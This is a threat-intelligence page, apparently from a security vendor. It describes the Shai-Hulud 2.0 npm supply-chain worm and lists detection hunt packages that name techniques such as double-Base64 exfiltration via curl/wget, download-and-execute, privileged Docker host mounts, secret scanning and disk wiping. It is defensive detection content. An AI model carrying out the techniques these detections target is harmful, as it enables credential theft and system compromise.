UPDATE 12/08/2025: Shai-Hulud 2.0 represents an escalation of capability of the original npm-based supply-chain attack, adding earlier and broader execution paths, significantly expanded propagation, and deeper compromise capabilities across developer, CI/CD, and cloud environments. This new version has added preinstall execution for example, allowing the malware to run earlier in the installation process and reach more systems. It also introduces new payload components, including Bun-runtime-based scripts, which broaden where and how the malware can execute. Researchers have observed the campaign has grown dramatically in scale, compromising hundreds of npm packages and tens of thousands of GitHub repositories, aided by aggressive automated replication. It is also worthy to note that Shai-Hulud 2.0 also adds advanced exfiltration and persistence mechanisms, such as malicious GitHub Actions workflows that steal secrets or register backdoored runners, and it extends beyond the developer ecosystem to actively target cloud credentials across AWS, GCP, and Azure. Overall, Shai-Hulud 2.0 transforms the original worm into a far more automated, multi-platform, cloud-aware, and large-scale supply-chain threat.
Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!
This hunt package identifies shell commands where environment variables or content are double Base64 encoded and sent via curl/wget, potentially indicating exfiltration of sensitive data.
This Hunt Package identifies scenarios where Node.js, Bun, or npm act as the parent process for sudo commands that stop/restart systemd-resolved, overwrite resolved.conf, or flush iptables. This may indicate JS/Bun-based exploit chains modifying DNS and disabling egress controls.
This Threat Hunt package identifies the use of curl or wget followed by the potential execution of the downloaded payload via a scripting interpreter, such as Bash, Python, Perl, or others.
This use case is meant to identify command-line parameters indicative of the deletion or manipulation of a disk or file data. This can be done in an attempt to evade detection and destroy evidence of adversarial activities.
This package targets identification of malicious use cipher.exe, a legitimate Windows tool, designed for file encryption and secure data deletion. Because it is a legitimate and signed tool, its use might evade basic detection mechanisms that flag untrusted binaries, making it a favorite for \"living off the land\" (LOTL) techniques in post-exploitation activities.
This hunt package identifies instances where the 'chmod' command is used to modify file permissions, specifically focusing on changes that grant executable rights. By correlating these events with user contexts and known file paths, the package aims to highlight potentially malicious activities, such as the preparation of a system for exploitation or the setup of persistence mechanisms by unauthorized users.
This threat hunt package identifies instances where PowerShell is being used to download files from external sources, a common technique used in malware delivery and lateral movement. The hunt examines various methods by which PowerShell can be leveraged for file downloads, including the use of cmdlets such as Invoke-WebRequest (iwr), Invoke-RestMethod (irm), and Start-BitsTransfer (sbt), as well as direct utilization of .NET classes like System.Net.WebClient and HttpClient. The package also checks for potentially suspicious use of aliases (curl, wget) and other common executables that invoke PowerShell scripts to download malicious payloads.
This hunt package aims to identify TruffleHog execution and associated secret-scanning behavior on endpoints, including suspicious file creation and repository access. The goal is to identify unauthorized credential discovery or secret exfiltration attempts in both developer and production environments.
This hunt detects unexpected DNS requests to api.github.com originating from developer endpoints. Such activity may indicate unauthorized secret scanning, repository modification, or credential exfiltration attempts. The hunt focuses on identifying abnormal API interactions that deviate from normal developer workflows, helping to detect potential misuse of tools like TruffleHog or other automated repository scanning utilities.
This hunt package identifies Node.js spawning the Bun runtime during npm lifecycle events. This behavior aligns with malicious supply-chain execution patterns seen in Shai-Hulud 2.0, where npm preinstall scripts trigger unauthorized execution of alternative runtimes.
This hunt package identifies the use of consecutive Base64 encoding operations (e.g., base64 | base64) which may indicate attempts to obfuscate or exfiltrate data.
This Hunt Package identifies Docker being used to start a privileged container that mounts the host filesystem (e.g., / or /etc) to gain local privilege escalation, similar to behaviors seen in Shai-Hulud 2.0 and other cloud-focused threat actors.
Intel 471 discovered a new Android trojan, FvncBot, that masquerades as a security application for mBank, a major Polish bank. Our Malware Intelligence team analyzed its code, which is new and not based on other leaked malware code.
Lynx Ransomware is rapidly expanding, targeting organizations across North America and Europe with data theft and double extortion, backed by a growing network of skilled affiliates.
Qilin Ransomware Group is a rapidly evolving RaaS operation that first became widely visible in mid-2022 and has since escalated its attacks in both volume and sophistication.
Stay informed with our weekly executive update, sending you the latest news and timely data on the threats, risks, and regulations affecting your organization.